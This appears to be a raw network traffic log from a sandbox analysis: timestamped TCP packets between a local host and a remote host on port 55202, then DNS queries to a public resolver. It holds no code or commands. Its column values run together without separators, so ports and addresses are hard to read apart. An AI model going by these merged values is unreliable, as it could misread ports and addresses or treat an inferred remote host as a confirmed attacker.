                                                            Sep 25, 2024 08:33:39.181843996 CEST5520249183147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:39.192507982 CEST4918355202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:39.197384119 CEST5520249183147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:39.208110094 CEST4918355202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:39.217432976 CEST5520249183147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:39.223721981 CEST4918355202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:39.228514910 CEST5520249183147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:39.239330053 CEST4918355202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:39.244148970 CEST5520249183147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:39.254889011 CEST4918355202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:39.259731054 CEST5520249183147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:39.270622969 CEST4918355202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:39.275435925 CEST5520249183147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:39.286078930 CEST4918355202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:39.290899038 CEST5520249183147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:39.301677942 CEST4918355202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:39.602036953 CEST5520249183147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:39.602086067 CEST4918355202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:39.602899075 CEST5520249183147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:39.606833935 CEST5520249183147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:41.699512005 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:41.704319000 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:41.707238913 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:41.794224024 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:41.799081087 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:41.821283102 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:41.826734066 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:41.844537973 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:41.849319935 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:41.875688076 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:41.880512953 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:41.952307940 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:41.957125902 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:42.311094999 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:42.315864086 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:42.435787916 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:42.440658092 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:42.453140020 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:42.457967997 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:42.482072115 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:42.487046957 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:42.487216949 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:42.492050886 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:42.500013113 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:42.504827976 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:42.515396118 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:42.520275116 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:42.531073093 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:42.535883904 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:42.546734095 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:42.551476002 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:42.562196016 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:42.566993952 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:42.577771902 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:42.582515001 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:42.593426943 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:42.598228931 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:42.609040022 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:42.613771915 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:42.624751091 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:42.629642010 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:42.640924931 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:42.645710945 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:42.655986071 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:42.660748959 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:42.671407938 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:42.676214933 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:42.687134981 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:42.691905975 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:42.702601910 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:42.707525015 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:42.719408989 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:42.724302053 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:42.733879089 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:42.738689899 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:42.750231028 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:42.755108118 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:42.765315056 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:42.770158052 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:42.786936998 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:42.792171001 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:42.796701908 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:42.801507950 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:42.811762094 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:42.816715002 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:42.827354908 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:42.832142115 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:42.843281031 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:42.848031998 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:42.858633041 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:42.863431931 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:42.874464989 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:42.879240990 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:42.889823914 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:42.894614935 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:42.905304909 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:42.910147905 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:42.920912027 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:42.925771952 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:42.936578035 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:42.941445112 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:42.952655077 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:42.957483053 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:42.967866898 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:42.972765923 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:42.983395100 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:42.988209963 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:42.999188900 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.004065037 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.014540911 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.019323111 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.030508041 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.035315037 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.046912909 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.051753998 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.061387062 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.066241980 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.076973915 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.081837893 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.092533112 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.097348928 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.131671906 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.136486053 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.139494896 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.144406080 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.155011892 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.159786940 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.170629025 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.175483942 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.186189890 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.191196918 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.201778889 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.206590891 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.217462063 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.222286940 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.233140945 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.238030910 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.248646021 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.253421068 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.264234066 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.269001961 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.280751944 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.285569906 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.295469999 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.300318003 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.311130047 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.315959930 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.326613903 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.331468105 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.342535019 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.347261906 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.358158112 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.363051891 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.373493910 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.378412962 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.388997078 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.393913031 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.404596090 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.409537077 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.420170069 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.424895048 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.436309099 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.441575050 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.474016905 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.478895903 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.482563019 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.488990068 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.498475075 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.503207922 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.514000893 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.518734932 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.529447079 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.534312963 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.545232058 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.550033092 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.560551882 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.565531969 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.576383114 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.581425905 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.591773987 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.597888947 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.607405901 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.615014076 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.623039961 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.627876997 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.638638020 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.643601894 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.656169891 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.661026955 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.670161963 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.674920082 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.685563087 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.693192005 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.701155901 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.706693888 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.716664076 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.721498966 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.732144117 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.736969948 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.748186111 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.753081083 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.763343096 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.768162966 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.778984070 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.783813000 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.794680119 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.799501896 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.816787958 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.821624041 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.826145887 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.832031965 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.841352940 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.847989082 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.857004881 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.862277031 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.872582912 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.877501965 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.888299942 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.893287897 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.903894901 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.908957958 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.919603109 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.924432039 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.935039043 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.939914942 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.950599909 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.955724001 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.966228962 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.971281052 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:43.982183933 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:43.987060070 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:44.006742001 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:44.011624098 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:44.012933969 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:44.017807007 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:44.028790951 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:44.033617020 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:44.044219971 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:44.052054882 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:44.059783936 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:44.064618111 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:44.075366020 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:44.081911087 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:44.090972900 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:44.097198009 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:44.107901096 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:44.112839937 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:44.122137070 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:44.128384113 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:44.161231041 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:44.166038990 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:44.168948889 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:44.173973083 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:44.184576035 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:44.191375017 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:44.200136900 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:44.206545115 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:44.215941906 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:44.221049070 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:44.231317043 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:44.236601114 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:44.249288082 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:44.254143953 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:44.262608051 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:44.267489910 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:44.278218985 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:44.283045053 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:44.293942928 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:44.298721075 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:44.309336901 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:44.314135075 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:44.324958086 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:44.329777956 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:44.340548992 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:44.345396996 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:44.356199980 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:44.360992908 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:44.362838984 CEST5520249184147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:33:44.362899065 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:46.415292978 CEST4918455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:33:46.420241117 CEST5520249184147.185.221.22192.168.2.22
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Sep 25, 2024 08:30:06.919917107 CEST5456253192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:30:06.926343918 CEST53545628.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:30:08.218153954 CEST5291753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:30:08.231156111 CEST53529178.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:30:12.515623093 CEST6275153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:30:12.528614044 CEST53627518.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:30:18.411354065 CEST5789353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:30:18.425621033 CEST53578938.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:30:23.731686115 CEST5482153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:30:23.745908976 CEST53548218.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:30:29.010267019 CEST5471953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:30:29.017741919 CEST53547198.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:30:32.687982082 CEST4988153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:30:32.701456070 CEST53498818.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:30:38.301603079 CEST5499853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:30:38.309539080 CEST53549988.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:30:41.531122923 CEST5278153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:30:41.543303013 CEST53527818.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:30:44.962779045 CEST6392653192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:30:44.969809055 CEST53639268.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:30:48.677516937 CEST6551053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:30:48.684670925 CEST53655108.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:30:53.309386015 CEST6267253192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:30:53.323092937 CEST53626728.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:30:57.553385019 CEST5647553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:30:57.560218096 CEST53564758.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:02.216763020 CEST4938453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:02.223879099 CEST53493848.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:05.695902109 CEST5484253192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:05.703425884 CEST53548428.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:09.798326015 CEST5810553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:09.887135983 CEST53581058.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:09.887406111 CEST5810553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:09.894753933 CEST53581058.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:13.636140108 CEST6492853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:13.643105030 CEST53649288.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:13.645436049 CEST6492853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:13.651901007 CEST53649288.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:13.654268980 CEST6492853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:13.661195993 CEST53649288.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:13.663250923 CEST6492853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:13.670356989 CEST53649288.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:13.670542955 CEST6492853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:13.676781893 CEST53649288.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:13.825798035 CEST5739053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:13.832819939 CEST53573908.8.8.8192.168.2.22
